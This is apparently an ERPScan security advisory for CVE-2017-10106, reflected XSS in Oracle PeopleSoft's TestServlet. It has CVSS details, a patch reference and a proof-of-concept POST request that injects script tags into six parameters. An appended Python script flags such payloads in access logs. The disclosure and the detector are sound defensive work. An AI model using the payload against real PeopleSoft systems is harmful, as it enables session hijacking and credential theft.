ERPSCAN-17-037
Jan 26, 2017

Multiple XSS Vulnerabilities in TestServlet (PeopleSoft)

2017-01-26 00:00:00
erpscan.io

EPSS: 0.002
Percentile: 54.8%

Application: Oracle PeopleSoft
Versions Affected: PeopleTools 8.54, 8.55
Vendor: Oracle
Bugs: XSS
Reported: 26.01.2017
Vendor response: 27.01.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Dmitri Iudin aka @ret5et (ERPScan)

VULNERABILITY INFORMATION

Class: XSS [CWE-79]
Risk: Medium
Impact: Modify displayed content from a Web site, steal authentication information of a user
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10106

CVSS Information

CVSS Base Score v3: 6.1 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) Required (R)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Changed (C)
C: Impact to Confidentiality Low (L)
I: Impact to Integrity Low (L)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

An attacker can use a special HTTP request to hijack session data of administrators or users of the web resource.

VULNERABLE PACKAGES

ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, apply the Oracle CPU July 2017 patches.

TECHNICAL DESCRIPTION

Proof of Concept

```http
POST /pspc/test?userID=<script>alert(1)</script>&password=<script>alert(2)</script>&languageCode==<script>alert(5)</script>&siteName=<script>alert(3)</script>&CREFName=<script>alert(4)</script>&portalName=<script>alert(6)</script>&command=login HTTP/1.1
Host: 172.16.2.230:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 twitter:@ret5et
Accept-Encoding: gzip, deflate
Content-Length: 0
```
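As an added detection check, not part of the ERPScan advisory or of PeopleSoft itself: a Python scan over web-server access-log lines that flags requests to /pspc/test whose six reflected parameters (the ones named in the PoC above) carry HTML metacharacters. The sample log lines, the metacharacter list and the Common Log Format layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The six /pspc/test parameters the advisory's PoC shows being reflected.
REFLECTED_PARAMS = {"userID", "password", "languageCode",
                    "siteName", "CREFName", "portalName"}
# Metacharacters that should never reach these parameters raw (assumed list).
HTML_META = re.compile(r"[<>]|javascript:", re.IGNORECASE)
# Request-line part of a Common Log Format entry (assumed log layout).
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return {param: decoded value} for /pspc/test parameters carrying metacharacters."""
    parts = urlsplit(target)
    if parts.path != "/pspc/test":
        return {}
    # parse_qs percent-decodes; it splits on the first '=', so the PoC's
    # 'languageCode==<script>' form yields name 'languageCode', value '=<script>...'.
    query = parse_qs(parts.query, keep_blank_values=True)
    return {name: v for name, values in query.items() if name in REFLECTED_PARAMS
            for v in values if HTML_META.search(v)}

def scan_log(lines):
    """Return [(line_no, param, value)] for every flagged request in the log."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group("target")).items():
            findings.append((n, name, value))
    return findings

# Constructed sample log lines (not from the advisory); lines 2 and 4 carry payloads,
# line 3 carries one on a different path and must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jan/2017:12:00:00 +0000] "POST /pspc/test?userID=admin&password=secret&command=login HTTP/1.1" 200 512',
    '10.0.0.5 - - [26/Jan/2017:12:00:01 +0000] "POST /pspc/test?userID=%3Cscript%3Ealert(1)%3C/script%3E&command=login HTTP/1.1" 200 545',
    '10.0.0.5 - - [26/Jan/2017:12:00:02 +0000] "GET /pspc/other?cmd=%3Cscript%3E HTTP/1.1" 200 1024',
    '10.0.0.5 - - [26/Jan/2017:12:00:03 +0000] "POST /pspc/test?languageCode==%3Cscript%3Ealert(5)%3C/script%3E&command=login HTTP/1.1" 200 545',
]

if __name__ == "__main__":
    for line_no, param, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {param}={value!r}")
```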
